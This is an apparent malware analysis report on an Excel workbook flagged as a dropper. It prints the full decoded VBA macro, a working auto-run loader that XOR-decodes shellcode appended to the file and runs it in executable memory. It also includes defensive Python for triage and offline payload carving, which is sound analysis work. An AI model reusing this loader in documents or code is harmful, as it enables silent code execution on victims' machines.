Verdict: MALICIOUS
Risk score: 138

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1203 Exploitation for Client Execution

Malware Insights
The workbook carries both an Excel 4.0 (XLM) macro sheet and a VBA project, but execution lives in the VBA. Workbook_Open calls Document_Open, which calls the loader routine IqQsCEAqnVJvCzh. That routine declares CreateThread and VirtualAlloc from kernel32 under random aliases (KbwwMGLUx, PWUFrFPWzTDZatGuCMUnsLK) and NtWriteVirtualMemory from ntdll under its real name, then reads the saved workbook file back from disk (ActiveWorkbook.FullName), splits its contents on a long alphanumeric marker string, keeps the segment after the last occurrence, drops its first two characters, XOR-decodes it with the fixed key 'PPtJWvtvyNWfiupLoTFcAnlTtJz', copies the result into a buffer allocated with MEM_COMMIT (&H1000) and PAGE_EXECUTE_READWRITE (&H40) in its own process (handle -1), and starts it with CreateThread. The second stage is therefore shellcode appended to the document itself rather than downloaded, and it never touches disk: ClamAV's 'Xls.Dropper.Agent-6335064-0' name identifies the family, while the observed mechanism is an in-memory loader. The XLM sheet ('Makro') is listed by olevba with no formulas, so the XLM heuristic reflects the sheet's presence rather than an Auto_Open chain. The whole-file ClamAV hit is the only signature match; the carved VBA module on its own matched no ClamAV signature (see Detection below), so for related samples rely on the API-alias, self-read and identifier heuristics rather than the signature.
Heuristics (7)

| Heuristic | Severity | ID | Details |
|---|---|---|---|
| ClamAV: Xls.Dropper.Agent-6335064-0 | critical | CLAMAV_DETECTION | ClamAV detected this file as malware: Xls.Dropper.Agent-6335064-0 |
| Reference to VirtualAlloc API | medium | SC_STR_VIRTUALALLOC | Reference to VirtualAlloc API |
| Excel 4.0 (XLM) macro sheet present | medium | OLE_XLM_AUTOOPEN | Workbook contains an Excel 4.0 macro sheet sub-stream. XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022. |
| VBA macros detected | medium | OLE_VBA_MACROS | Document contains VBA macro code (2 related findings, the two rows below) |
| Document_Open macro | low | OLE_VBA_DOCOPEN | Matched line in script: `Public Sub Document_Open()`, which calls IqQsCEAqnVJvCzh |
| Workbook_Open macro | low | OLE_VBA_WBOPEN | Matched line in script: `Sub Workbook_Open()`, which calls Document_Open |
| Suspicious extracted artifact | info | EXTRACTED_FILE_STATIC_TRIAGE | One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms. |
Extracted artifacts (2)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| xlm_macros.txt | xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 172 bytes | 63d3437f0ef9d6e6f7cafadd6a5473d8826a0decff0e7e519719b73893f4ae2d |
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4736 bytes | 332c7c5f127fe66c698aaca2ebf7970e4db8479c9065d639909eb60860dfefba |

xlm_macros.txt, script preview (first 1,000 lines of the extracted script). Only the BIFF records for the macro sheet are listed; the Sheet,Reference,Formula,Value header is followed by no rows, so olevba extracted no XLM formulas:

```text
' 0085     14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - Makro
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
```
macros.bas, detection

- ClamAV (on the carved module alone): No threats found. The Xls.Dropper.Agent-6335064-0 hit above is against the whole workbook, not this extracted source.
- Obfuscation or payload: likely. 37 of 71 identifiers look randomly generated (e.g. 'hdsFruiWGzuHRbjDNSXZxgVPKNuZkLiIQBPnvlno'), consistent with name-mangling obfuscation. The carved module contains 1 long base64-like blob; in this source that blob is the Split() delimiter string, not an encoded payload. The payload itself sits outside the VBA project, appended to the workbook file (see the macro source).
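The static checks that fired on macros.bas (API imports hidden behind Declare aliases, a workbook that reads its own file, Chr/Asc XOR loops, random-looking identifier names) are straightforward to reproduce on any decoded module. The Python below is an added example, not the analyzer's own code: the thresholds in looks_random and the API lists are assumptions tuned on this sample, and SAMPLE_MODULE is a constructed, abridged stand-in for the module shown later on this page, reusing its identifiers.

```python
"""Static triage of a decoded VBA module (added example; thresholds are assumptions)."""
import re

# Constructed, abridged stand-in modelled on the decoded module on this page.
SAMPLE_MODULE = r'''Attribute VB_Name = "BuCalismaKitabi"
Option Explicit
#If VBA7 Then
Private Declare PtrSafe Function KbwwMGLUx Lib "kernel32" Alias "CreateThread" (ByVal a As Long, ByVal b As Long, ByVal c As LongPtr, d As Long, ByVal e As Long, f As Long) As LongPtr
Private Declare PtrSafe Function PWUFrFPWzTDZatGuCMUnsLK Lib "kernel32" Alias "VirtualAlloc" (ByVal a As Long, ByVal b As LongPtr, ByVal c As Long, ByVal d As Long) As LongPtr
Private Declare PtrSafe Function NtWriteVirtualMemory Lib "NTDLL" (ByVal a As LongPtr, ByVal b As LongPtr, ByVal c As String, ByVal d As LongPtr, ByRef e As LongPtr) As LongPtr
#End If
Const dLWCyrKSc = &H1000
Public Sub IqQsCEAqnVJvCzh()
Dim raw() As Byte
raw = vDRyoSBQHkkAjoWoXGTsfLvd(ActiveWorkbook.FullName)
End Sub
Public Function vDRyoSBQHkkAjoWoXGTsfLvd(ByVal TgYDYCQuD As String) As Byte()
Dim fh As Long
fh = FreeFile
Open TgYDYCQuD For Binary Access Read As fh
Close fh
End Function
Public Function vculRliv(k As String, s As String) As String
Dim i As Long
For i = 1 To Len(s)
vculRliv = vculRliv + Chr(Asc(Mid$(s, i, 1)) Xor Asc(Mid$(k, (i Mod Len(k)) + 1, 1)))
Next i
End Function
Sub Workbook_Open()
IqQsCEAqnVJvCzh
End Sub
'''

DECLARE_RE = re.compile(
    r'Declare\s+(?:PtrSafe\s+)?(?:Function|Sub)\s+(\w+)\s+Lib\s+"([^"]+)"'
    r'(?:\s+Alias\s+"([^"]+)")?', re.IGNORECASE)

# Exports that together make up an in-process shellcode loader (lists are assumptions).
ALLOC_APIS = {"virtualalloc", "virtualallocex", "ntallocatevirtualmemory", "heapalloc"}
WRITE_APIS = {"ntwritevirtualmemory", "writeprocessmemory", "rtlmovememory", "rtlcopymemory"}
THREAD_APIS = {"createthread", "createremotethread", "ntcreatethreadex", "queueuserapc"}

# Keywords and built-ins excluded from the identifier statistics.
VBA_WORDS = {
    "attribute", "option", "explicit", "if", "then", "else", "end", "private", "public",
    "declare", "ptrsafe", "function", "sub", "lib", "alias", "byval", "byref", "as",
    "long", "longptr", "integer", "string", "byte", "const", "dim", "redim", "for", "to",
    "next", "mod", "xor", "and", "or", "not", "open", "binary", "access", "read", "close",
    "get", "put", "erase", "err", "raise", "len", "lenb", "mid", "asc", "chr", "split",
    "strconv", "ubound", "lbound", "freefile", "dir", "lof", "activeworkbook", "fullname",
    "vba7", "true", "false", "nothing", "call", "exit", "set", "let", "msgbox",
}
VOWELS = set("aeiouAEIOU")


def declared_apis(src: str) -> dict:
    """Map (library, real export name) -> alias used in the code; the 32- and 64-bit
    #If branches declare the same exports, so they collapse to one entry."""
    apis = {}
    for name, lib, alias in DECLARE_RE.findall(src):
        apis[(lib.lower(), (alias or name).lower())] = name
    return apis


def code_only(src: str) -> str:
    """Drop string literals, comments, Attribute lines and hex literals so only names remain."""
    src = re.sub(r'"[^"\n]*"', '""', src)
    src = re.sub(r"'[^\n]*", "", src)
    src = re.sub(r"^Attribute\s[^\n]*", "", src, flags=re.MULTILINE)
    return re.sub(r"&H[0-9A-Fa-f]+", "0", src)


def looks_random(name: str) -> bool:
    """Assumed heuristic: long names with a run of 3+ capitals, under 20% vowels, or a run
    of 5+ consonants. CamelCase API names such as NtWriteVirtualMemory stay below all three."""
    letters = [c for c in name if c.isalpha()]
    if len(name) < 8 or not letters:
        return False
    max_upper = max_cons = upper_run = cons_run = 0
    for c in letters:
        upper_run = upper_run + 1 if c.isupper() else 0
        cons_run = cons_run + 1 if c not in VOWELS else 0
        max_upper, max_cons = max(max_upper, upper_run), max(max_cons, cons_run)
    vowel_ratio = sum(c in VOWELS for c in letters) / len(letters)
    return max_upper >= 3 or vowel_ratio < 0.2 or max_cons >= 5


def identifier_stats(src: str):
    """Return (random-looking count, total identifier count, the random-looking names)."""
    names = {n for n in re.findall(r"\b[A-Za-z_][A-Za-z0-9_]*", code_only(src))
             if n.lower() not in VBA_WORDS}
    random_names = sorted(n for n in names if looks_random(n))
    return len(random_names), len(names), random_names


def triage(src: str) -> list:
    findings = []
    apis = declared_apis(src)
    exports = {api for _lib, api in apis}
    for (lib, api), alias in sorted(apis.items()):
        if alias.lower() != api:
            findings.append(f"{lib}!{api} imported under alias {alias}")
    if exports & ALLOC_APIS and exports & WRITE_APIS and exports & THREAD_APIS:
        findings.append("allocate + write + thread: in-process shellcode execution")
    if re.search(r"ActiveWorkbook\.FullName", src) and re.search(r"\bOpen\b.*\bFor\s+Binary\b", src, re.I):
        findings.append("reads its own workbook file: payload probably appended to the document")
    if re.search(r"\bChr\s*\(.*\bXor\b", src, re.I):
        findings.append("byte-wise XOR decode loop (Chr/Asc with Xor)")
    n_rand, n_total, _ = identifier_stats(src)
    if n_rand >= 3 and n_rand / n_total >= 0.2:
        findings.append(f"{n_rand} of {n_total} identifiers look randomly generated")
    return findings


if __name__ == "__main__":
    for line in triage(SAMPLE_MODULE):
        print(line)
```

Point triage() at the olevba output of a real module (olevba -c file.xls) rather than the stand-in; the alias map is the useful pivot, since the random names change between builds while the real exports behind them do not.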
macros.bas, script preview (first 1,000 lines of the extracted script). The module name "BuÇalışmaKitabı" is the Turkish-locale name of the ThisWorkbook module, which is why its Workbook_Open handler runs when the file is opened. Lines beginning with `' analyst:` were added here and are not part of the carved artifact.

```vba
Attribute VB_Name = "BuÇalışmaKitabı"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
' analyst: kernel32 imports declared under random aliases; NtWriteVirtualMemory keeps its real name.
#If VBA7 Then
Private Declare PtrSafe Function KbwwMGLUx Lib "kernel32" Alias "CreateThread" (ByVal yFwSUySmWlHEXAzpgNYgJVjcU As Long, ByVal eARQWpDri As Long, ByVal yFaprdDwbHAmwuTsYahCw As LongPtr, YLusvgpraGsRQB As Long, ByVal IPFsNbmJRexWEqDjFleGpVZ As Long, xhJHTUEDsFqkCkJsMbDoY As Long) As LongPtr
Private Declare PtrSafe Function PWUFrFPWzTDZatGuCMUnsLK Lib "kernel32" Alias "VirtualAlloc" (ByVal LoBcRjvTtHbgsHpCUpOmVcLvRiqV As Long, ByVal xfPIKUnkIfJwxWdXCgkf As LongPtr, ByVal rwbtbJCglITznWCmxINbsljeQ As Long, ByVal fIypcfQPfIOoIkLe As Long) As LongPtr
Private Declare PtrSafe Function NtWriteVirtualMemory Lib "NTDLL" (ByVal wQWjZBLexxdyfmWD As LongPtr, ByVal DUIVFNJyRUxiZCpoON As LongPtr, ByVal UpfhMlFIMra As String, ByVal RLgHRvBQcmKiGnV As LongPtr, ByRef VOkqzIImxNVKafXh As LongPtr) As LongPtr
#Else
Private Declare Function KbwwMGLUx Lib "kernel32" Alias "CreateThread" (ByVal yFwSUySmWlHEXAzpgNYgJVjcU As Long, ByVal eARQWpDri As Long, ByVal yFaprdDwbHAmwuTsYahCw As Long, YLusvgpraGsRQB As Long, ByVal IPFsNbmJRexWEqDjFleGpVZ As Long, xhJHTUEDsFqkCkJsMbDoY As Long) As Long
Private Declare Function PWUFrFPWzTDZatGuCMUnsLK Lib "kernel32" Alias "VirtualAlloc" (ByVal LoBcRjvTtHbgsHpCUpOmVcLvRiqV As Long, ByVal xfPIKUnkIfJwxWdXCgkf As Long, ByVal rwbtbJCglITznWCmxINbsljeQ As Long, ByVal fIypcfQPfIOoIkLe As Long) As Long
Private Declare Function NtWriteVirtualMemory Lib "NTDLL" (ByVal wQWjZBLexxdyfmWD As Long, ByVal DUIVFNJyRUxiZCpoON As Long, ByVal UpfhMlFIMra As String, ByVal RLgHRvBQcmKiGnV As Long, ByRef VOkqzIImxNVKafXh As Long) As Long
#End If
' analyst: &H1000 = MEM_COMMIT, &H40 = PAGE_EXECUTE_READWRITE
Const dLWCyrKSc = &H1000
Const HvZmRoFmIemsxuAH = &H40
Public Sub IqQsCEAqnVJvCzh()
Dim VHDDGQOIvEcHoVWuIzFyrUkgHrPU() As Byte
' analyst: reads the saved workbook file itself back from disk
VHDDGQOIvEcHoVWuIzFyrUkgHrPU = vDRyoSBQHkkAjoWoXGTsfLvd(ActiveWorkbook.FullName)
Dim JgJdiSVLOQRBiXYCScsYpN As String
' analyst: 64 = vbUnicode, byte array to String
JgJdiSVLOQRBiXYCScsYpN = StrConv(VHDDGQOIvEcHoVWuIzFyrUkgHrPU, 64)
Dim TIEawx
' analyst: the delimiter is the "base64-like blob" flagged above; the payload follows its last occurrence
TIEawx = Split(JgJdiSVLOQRBiXYCScsYpN, "hdsFruiWGzuHRbjDNSXZxgVPKNuZkLiIQBPnvlnovWpmVQWRNctXsXybhDUDajLUqLRpmWiCFIDAQJTTQCmhslqSdNgRqKolkvWkZHFQUQsJuXkyKbMxXEBeuYmyPrlVurqvNIUjWvmBSHyfCHgpXQoFTRPaugbDFxocHPLbgCBCrZmNAhVhkWXEdKBVT")
Dim oaUYMytDfdbIUJOXjXmDOpxVvVd As String
Dim BmDubhXpZ As String
Dim MuzsiYOcKJKiNouLDnIHufF As String
' analyst: vbUnicode then vbFromUnicode (64, 128) is a round-trip; the last segment is kept unchanged
BmDubhXpZ = StrConv(StrConv(TIEawx(UBound(TIEawx)), 64), 128)
' analyst: drop the first two characters after the delimiter
MuzsiYOcKJKiNouLDnIHufF = Mid$(BmDubhXpZ, 3, Len(BmDubhXpZ))
' analyst: repeating-key XOR decode with a fixed key
oaUYMytDfdbIUJOXjXmDOpxVvVd = vculRliv("PPtJWvtvyNWfiupLoTFcAnlTtJz", MuzsiYOcKJKiNouLDnIHufF)
#If VBA7 Then
Dim pZIQFpHF As LongPtr
Dim MLXTRqqLZIyRutlLQG As LongPtr
#Else
Dim pZIQFpHF As Long
Dim MLXTRqqLZIyRutlLQG As Long
#End If
' analyst: VirtualAlloc(NULL, len, MEM_COMMIT, PAGE_EXECUTE_READWRITE)
pZIQFpHF = PWUFrFPWzTDZatGuCMUnsLK(0, Len(oaUYMytDfdbIUJOXjXmDOpxVvVd), dLWCyrKSc, HvZmRoFmIemsxuAH)
' analyst: handle -1 is the current process; the String is passed as ANSI bytes
MLXTRqqLZIyRutlLQG = NtWriteVirtualMemory(-1, pZIQFpHF, oaUYMytDfdbIUJOXjXmDOpxVvVd, Len(oaUYMytDfdbIUJOXjXmDOpxVvVd), 0)
' analyst: CreateThread with the RWX buffer as start address
MLXTRqqLZIyRutlLQG = KbwwMGLUx(0, 0, pZIQFpHF, 0, 0, 0)
End Sub
' analyst: plain binary file read; Err 53 = File not found
Public Function vDRyoSBQHkkAjoWoXGTsfLvd(ByVal TgYDYCQuD As String) As Byte()
Dim BmDubhXpZ As Long
Dim MuzsiYOcKJKiNouLDnIHufF() As Byte
BmDubhXpZ = FreeFile
If LenB(Dir(TgYDYCQuD)) Then
Open TgYDYCQuD For Binary Access Read As BmDubhXpZ
ReDim MuzsiYOcKJKiNouLDnIHufF(LOF(BmDubhXpZ) - 1&) As Byte
Get BmDubhXpZ, , MuzsiYOcKJKiNouLDnIHufF
Close BmDubhXpZ
Else
Err.Raise 53
End If
vDRyoSBQHkkAjoWoXGTsfLvd = MuzsiYOcKJKiNouLDnIHufF
Erase MuzsiYOcKJKiNouLDnIHufF
End Function
Public Sub Document_Open()
IqQsCEAqnVJvCzh
End Sub
Sub Workbook_Open()
Document_Open
End Sub
' analyst: XOR each character of qEJGr with the key rxyGGuaONJUytyo, cycling 1-based through the key
Public Function vculRliv(rxyGGuaONJUytyo As String, qEJGr As String) As String
Dim GPtXgEDlzBoMv As Long
Dim VeWTITGwLHbDflAGyPeaRJnIo As String
Dim lCjskHdyelHQYyL As Integer, wIkxhYSyhCu As Integer, a As Long
For GPtXgEDlzBoMv = 1 To Len(qEJGr)
a = GPtXgEDlzBoMv Mod Len(rxyGGuaONJUytyo)
If a = 0 Then a = Len(rxyGGuaONJUytyo)
lCjskHdyelHQYyL = Asc(Mid$(qEJGr, GPtXgEDlzBoMv, 1))
wIkxhYSyhCu = Asc(Mid$(rxyGGuaONJUytyo, a, 1))
VeWTITGwLHbDflAGyPeaRJnIo = VeWTITGwLHbDflAGyPeaRJnIo + Chr(lCjskHdyelHQYyL Xor wIkxhYSyhCu)
Next GPtXgEDlzBoMv
vculRliv = VeWTITGwLHbDflAGyPeaRJnIo
End Function
```
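To recover the second stage without executing the macro, the carving logic of IqQsCEAqnVJvCzh and vculRliv can be replayed offline against the workbook file. The Python below is an added example, not the sample's or the analyzer's code: the marker and key are copied from the module above, build_carrier produces a constructed stand-in carrier (the real shellcode is not on this page), and the decoder models the StrConv/Asc/Chr pipeline as byte-exact, which holds for bytes that round-trip through the victim's ANSI code page (the Turkish locale suggests cp1254); bytes that do not round-trip would differ from this model.

```python
"""Offline replay of the payload carving in the macro above (added example)."""
import hashlib
import math
import sys

# Copied from the decoded module: the Split() delimiter and the XOR key given to vculRliv().
MARKER = b"hdsFruiWGzuHRbjDNSXZxgVPKNuZkLiIQBPnvlnovWpmVQWRNctXsXybhDUDajLUqLRpmWiCFIDAQJTTQCmhslqSdNgRqKolkvWkZHFQUQsJuXkyKbMxXEBeuYmyPrlVurqvNIUjWvmBSHyfCHgpXQoFTRPaugbDFxocHPLbgCBCrZmNAhVhkWXEdKBVT"
XOR_KEY = b"PPtJWvtvyNWfiupLoTFcAnlTtJz"
SKIP = 2  # Mid$(s, 3, Len(s)) drops the first two characters after the marker


def xor_with_key(data: bytes, key: bytes) -> bytes:
    """vculRliv(): position i (1-based) uses key char (i Mod Len(key)), with 0 wrapped
    to Len(key); in 0-based terms that is simply key[i % len(key)]."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def carve_payload(workbook: bytes) -> bytes:
    """Mirror IqQsCEAqnVJvCzh(): Split on MARKER, keep the last segment (UBound), drop
    SKIP bytes, XOR-decode. The StrConv(StrConv(x, 64), 128) pair is a vbUnicode /
    vbFromUnicode round-trip and is modelled as a no-op."""
    segments = workbook.split(MARKER)
    if len(segments) < 2:
        raise ValueError("marker not present: file is not a carrier for this loader")
    return xor_with_key(segments[-1][SKIP:], XOR_KEY)


def shannon_entropy(data: bytes) -> float:
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def summarize(payload: bytes) -> dict:
    """Pivot values for the decoded blob: size, hash, entropy and the first bytes."""
    return {
        "size": len(payload),
        "sha256": hashlib.sha256(payload).hexdigest(),
        "entropy": round(shannon_entropy(payload), 2),
        "head": payload[:8].hex(),
    }


def build_carrier(payload: bytes, filler: bytes = b"\r\n") -> bytes:
    """Constructed test carrier (not the real sample): an OLE header stub, the marker,
    the two filler bytes the loader skips, then the XOR-encoded payload."""
    assert len(filler) == SKIP
    stub = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 56
    return stub + MARKER + filler + xor_with_key(payload, XOR_KEY)


if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as fh:
            data = fh.read()
    else:
        # Constructed stand-in payload; the real second stage is not reproduced here.
        data = build_carrier(b"\xfc\x48\x83\xe4\xf0" + bytes(range(64)))
    print(summarize(carve_payload(data)))
```

Run it with the path of the on-disk workbook as its only argument (any file name for the script will do; the name is not fixed by the page). The sha256 and entropy of the decoded blob are what to pivot on; a decoded head that does not look like shellcode is the sign that the code-page caveat above applies to this victim's locale.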